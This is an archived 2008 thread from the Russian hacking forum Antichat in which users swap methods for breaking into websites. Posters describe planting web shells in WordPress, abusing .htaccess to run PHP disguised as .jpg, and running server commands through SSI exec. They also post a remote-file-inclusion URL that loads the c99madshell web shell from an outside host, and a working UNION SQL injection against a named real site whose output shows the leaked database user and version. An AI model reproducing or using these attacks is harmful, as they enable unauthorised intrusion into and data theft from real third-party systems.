ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.04.2008, 22:17
|
|
Banned
Регистрация: 18.04.2008
Сообщений: 8
Провел на форуме:
65191
Репутация:
48
|
|
на локалхосте
|
|
|
23.04.2008, 07:46
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Как залить шелл в Wordpress ?!
|
|
|
|
23.04.2008, 07:58
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
Сообщение от ~!DoK_tOR!~
Как залить шелл в Wordpress ?!
если есть доступ к админке, то отредактировать нужную страницу. system(); etc
|
|
|
|
23.04.2008, 08:14
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
есть, пробывал Fetal Error или File edited successfully. и потом выплняю
http://www.site.com/wp-admin/plugin-editor.php?file=get-recent-comments/get-recent-comments.php?cmd=ls пишет Sorry, that file cannot be edited. хотя файл сохранён
|
|
|
|
23.04.2008, 09:32
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637
Репутация:
27
|
|
я как-то заливал так. в .htaccess дописывал
Код:
AddHandler application/x-httpd-php .jpg
ищел в добовление новости, там было загрузить картинку, банально лил шелл с окончание jpg и все) |
|
|
|
23.04.2008, 12:20
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
Сообщение от Ershik
Точнее можете расписать, что с этим делать? сси использовать как "перл"-файл?
Для начала я засунул скрипты себе на хостинг, вашим скриптом воспользоваться не могу.
я забыл добавить .. так как на моём хосте всё в конфиге апача написано
Надо создать файл .htaccess
с содержанием
Код:
AddType text/html .shtml
AddHandler server-parsed .shtml
Options +Include
дальше можешь запустить скрипт который я написал выше
или же создать файл с расширением .shtml и написать в нём
Код:
<!--#exec cmd="ls -la"-->
где ls -la команда которую ты хочешь выполнить на сервере
и открыть его на сервере. пример www.site.ru/a.shtml
|
|
|
|
23.04.2008, 13:27
|
|
Новичок
Регистрация: 19.04.2008
Сообщений: 28
Провел на форуме:
201547
Репутация:
16
|
|
http://www.kat.kg/?file=[url] , что с етого можно поиметь ?  |
|
|
|
23.04.2008, 13:35
|
|
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
Провел на форуме:
1608606
Репутация:
105
|
|
это уязвимость нзвается инклудом ч/з него иногда можно лит web-shell, вот юзай, например, это шелл, http://www.kat.kg/index.php?file=http://madnet.name/files/download/9_c99madshell.php
|
|
|
|
23.04.2008, 13:55
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
http://www.moldagrotehnica.md/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,database( ),user(),version()),0x71),0x71),6,7/*
что можно ещё нарыть ?
|
|
|
|
23.04.2008, 14:19
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
nicusor
Там восемь столбцов
_http://www.moldagrotehnica.md/index.php?newsid=-66+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat (user(),char(58),version(),char(58),database()),0x 71),0x71),4,5,6,7,8/*
agro@localhost:4.1.14:moldagrotehnica_md
Подбирай таблицы если надо
Последний раз редактировалось jokester; 23.04.2008 в 18:08..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
